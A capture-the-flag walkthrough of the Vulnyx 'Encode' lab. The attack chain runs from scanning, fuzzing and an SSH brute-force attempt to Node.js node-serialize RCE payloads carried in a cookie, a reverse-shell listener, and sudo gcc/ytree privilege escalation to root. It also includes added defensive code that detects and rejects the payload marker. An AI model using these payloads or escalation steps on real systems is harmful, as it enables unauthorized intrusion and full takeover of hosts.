Vulnyx-Encode-Walkthrough
城南花已开 Lv6

Information gathering

Service detection

```
sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.228 08:00:27:d1:79:1e PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.022 seconds (126.61 hosts/sec). 4 responded
export ip=192.168.60.228
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.228:22
Open 192.168.60.228:80
Open 192.168.60.228:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 13:41 CST
Initiating ARP Ping Scan at 13:41
Scanning 192.168.60.228 [1 port]
Completed ARP Ping Scan at 13:41, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:41
Completed Parallel DNS resolution of 1 host. at 13:41, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:41
Scanning 192.168.60.228 [3 ports]
Discovered open port 3000/tcp on 192.168.60.228
Discovered open port 80/tcp on 192.168.60.228
Discovered open port 22/tcp on 192.168.60.228
Completed SYN Stealth Scan at 13:41, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.228
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-03-05 13:41:38 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 64
MAC Address: 08:00:27:D1:79:1E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
```

Directory fuzzing

There is nothing of value on port 80.

```
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.228
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 12]
/manual (Status: 301) [Size: 317] [--> http://192.168.60.228/manual/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================
```

Judging from the box name, encode, we guess the directory names are most likely encoded, so a regular scan won't find them.

Fuzz with wfuzz, applying an encoder to the payload.

Apparently nothing there either.

```
❯ wfuzz -c  -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt,base64 -u "http://$ip:3000/FUZZ" --hw 15
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.228:3000/FUZZ
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000014: 200 0 L 2 W 11 Ch "http://192.168.60.228:3000/"
000041849: 200 0 L 2 W 11 Ch "http://192.168.60.228:3000/"

Total time: 272.1738
Processed Requests: 61854
Filtered Requests: 61852
Requests/sec.: 227.2591
```

Node.js deserialization

However, while visiting port 3000 I noticed a cookie in the response carrying what looked like base64-encoded data.

```
❯ curl -iv $ip:3000
* Trying 192.168.60.228:3000...
* Connected to 192.168.60.228 (192.168.60.228) port 3000
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 192.168.60.228:3000
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< X-Powered-By: Express
X-Powered-By: Express
< Set-Cookie: profile=eyJ1c2VybmFtZSI6ImNoYXJsaWUiLCJjb3VudHJ5IjoiZWV1dSIsImNpdHkiOiJ3YXNoaW5ndG9uIn0%3D; Max-Age=900; Path=/; Expires=Wed, 05 Mar 2025 06:18:42 GMT; HttpOnly
Set-Cookie: profile=eyJ1c2VybmFtZSI6ImNoYXJsaWUiLCJjb3VudHJ5IjoiZWV1dSIsImNpdHkiOiJ3YXNoaW5ndG9uIn0%3D; Max-Age=900; Path=/; Expires=Wed, 05 Mar 2025 06:18:42 GMT; HttpOnly
< Content-Type: text/html; charset=utf-8
Content-Type: text/html; charset=utf-8
< Content-Length: 11
Content-Length: 11
< ETag: W/"b-OX453OLUbwKdge2BUCoR8u6eN7M"
ETag: W/"b-OX453OLUbwKdge2BUCoR8u6eN7M"
< Date: Wed, 05 Mar 2025 06:03:42 GMT
Date: Wed, 05 Mar 2025 06:03:42 GMT
< Connection: keep-alive
Connection: keep-alive
< Keep-Alive: timeout=5
Keep-Alive: timeout=5
<

* Connection #0 to host 192.168.60.228 left intact
hello serve%
```

Decode it to get some information about the user.

```
echo "eyJ1c2VybmFtZSI6ImNoYXJsaWUiLCJjb3VudHJ5IjoiZWV1dSIsImNpdHkiOiJ3YXNoaW5ndG9uIn0"|base64 -d
{"username":"charlie","country":"eeuu","city":"washington"}%
```

Use cupp to generate a wordlist from the name, country and city.

Try brute-forcing with the wordlist, but SSH doesn't allow password logins 😅 GG.

```
❯ python cupp.py -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | [email protected] ]
[ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: charlie
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]: Y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: eeuu,washington
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to charlie.txt, counting 260 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with charlie.txt and shoot! Good luck!
❯ hydra -l charlie -P charlie.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-05 14:10:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.60.228:22/
[ERROR] target ssh://192.168.60.228:22/ does not support password authentication (method reply 4).
❯ ssh adaa@$ip
The authenticity of host '192.168.60.228 (192.168.60.228)' can't be established.
ED25519 key fingerprint is SHA256:FQI6CQCD3uUo59olao5SmG/3b/R9quOafr6mSSLvdlA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.228' (ED25519) to the list of known hosts.
adaa@192.168.60.228: Permission denied (publickey).
```

Clearly the wrong path; switch direction and capture the request with Burp Suite.

I re-encoded the cookie as base64 and found that my modified content is displayed normally.


I randomly deleted a bit of the data to make it throw an error.

It turns out to be Node.js-based deserialization.


Use the following payload:

[PayloadsAllTheThings/Insecure Deserialization/Node.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure Deserialization/Node.md#node-serialize)

[TheHackersLabs-Token Of Love-Walkthrough | Pepster’Blog](https://pepster.me/TheHackersLabs-Token Of Love-Walkthrough/#node-js-Deserialization)

Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX

```json
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
```

Modify it slightly, base64-encode it, and resend the request.

Test whether it executes: ICMP echo requests arrive from the target.

```
{"username":"_$$ND_FUNC$$_function(){require('child_process').exec('ping 192.168.60.100 -c 2', function(error,stdout, stderr) { console.log(stdout) });}()","country":"eeuu","city":"washington"}
------------------------------------------
sudo tcpdump icmp
[sudo] password for Pepster:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
14:33:52.708939 IP 192.168.60.228 > 192.168.60.100: ICMP echo request, id 842, seq 1, length 64
14:33:52.709381 IP 192.168.60.100 > 192.168.60.228: ICMP echo reply, id 842, seq 1, length 64
14:33:53.710871 IP 192.168.60.228 > 192.168.60.100: ICMP echo request, id 842, seq 2, length 64
14:33:53.710883 IP 192.168.60.100 > 192.168.60.228: ICMP echo reply, id 842, seq 2, length 64
```
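The root cause here is that the app hands the `profile` cookie to node-serialize's `unserialize()`, which turns any string tagged `_$$ND_FUNC$$_` back into a function and, with the trailing `()`, runs it. As an added example (not code from the original post or from the target application), the following Node.js snippet shows how the same cookie can be parsed as pure data and how the marker can be flagged for detection; the cookie layout (URL-encoded base64 of a JSON object) is the one observed above, and the function names are hypothetical.

```javascript
// Added example, not code from the original post: a hardened replacement for an
// Express app that unserializes its "profile" cookie with node-serialize.
// Assumed cookie layout (as observed above): URL-encoded base64 of a JSON object.

// node-serialize tags serialized functions with this prefix; with a trailing "()"
// the function body is evaluated as an IIFE inside unserialize().
const ND_FUNC_MARKER = '_$$ND_FUNC$$_';

// Keys the application actually stores; every value must be a plain string.
const ALLOWED_KEYS = ['username', 'country', 'city'];

// Reverse the cookie encoding into raw JSON text (returns null on malformed input).
function decodeCookieText(cookieValue) {
  try {
    return Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
  } catch (e) {
    return null;
  }
}

// Detection rule usable in the app or over proxy logs: does the decoded cookie
// carry node-serialize's function marker at all? Legitimate profiles never do.
function containsSerializedFunction(cookieValue) {
  const text = decodeCookieText(cookieValue);
  return text !== null && text.includes(ND_FUNC_MARKER);
}

// Hardened parser: JSON.parse (which can never yield a function) plus a strict
// shape check, so the cookie is treated as data and nothing else.
function parseProfileCookie(cookieValue) {
  const text = decodeCookieText(cookieValue);
  if (text === null) return { ok: false, reason: 'malformed encoding' };
  if (text.includes(ND_FUNC_MARKER)) return { ok: false, reason: 'serialized function marker' };
  let obj;
  try { obj = JSON.parse(text); } catch (e) { return { ok: false, reason: 'invalid JSON' }; }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'not an object' };
  }
  const keys = Object.keys(obj).sort();
  const shapeOk = keys.join(',') === [...ALLOWED_KEYS].sort().join(',')
    && ALLOWED_KEYS.every((k) => typeof obj[k] === 'string');
  if (!shapeOk) return { ok: false, reason: 'unexpected keys or non-string values' };
  return { ok: true, profile: obj };
}

// Build a cookie value from a profile object (used to construct demo inputs).
function encodeProfileCookie(profile) {
  return encodeURIComponent(Buffer.from(JSON.stringify(profile), 'utf8').toString('base64'));
}
```

Running `parseProfileCookie` on the cookie captured above yields the charlie profile, while a cookie whose `username` carries the `_$$ND_FUNC$$_` marker is rejected before anything is evaluated.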

User privilege escalation

Modify the payload and try to get a reverse shell.

gcc can be executed via sudo to escalate to charlie.

```
❯ pwncat-cs -lp 4444
[14:51:43] Welcome to pwncat 🐈! __main__.py:164
[14:52:09] received connection from 192.168.60.228:57140 bind.py:84
[14:52:09] 0.0.0.0:4444: normalizing shell path manager.py:957
[14:52:10] 192.168.60.228:57140: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@encode:/var/www$ sudo -l
Matching Defaults entries for www-data on encode:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on encode:
(charlie) NOPASSWD: /usr/bin/gcc
(remote) www-data@encode:/var/www$ sudo -u charlie /usr/bin/gcc -wrapper /bin/bash,-s .
charlie@encode:/var/www$ cd ~
charlie@encode:~$ cat user.txt
08dbb8d26b8b558eb171978b5c16c020
```

Root privilege escalation

User charlie also has sudo rights.

```
charlie@encode:~$ sudo -l
Matching Defaults entries for charlie on encode:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charlie may run the following commands on encode:
(root) NOPASSWD: /usr/bin/ytree
```

ytree is a tool for browsing and managing the filesystem in the terminal.

Just press uppercase X to execute a command and escalate to root.


```
charlie@encode:/var/www$ sudo /usr/bin/ytree
root@encode:/var/www# id
uid=0(root) gid=0(root) grupos=0(root)
root@encode:/var/www# cat /root/root.txt
934ece5373c0361e33394b37c5b49582
```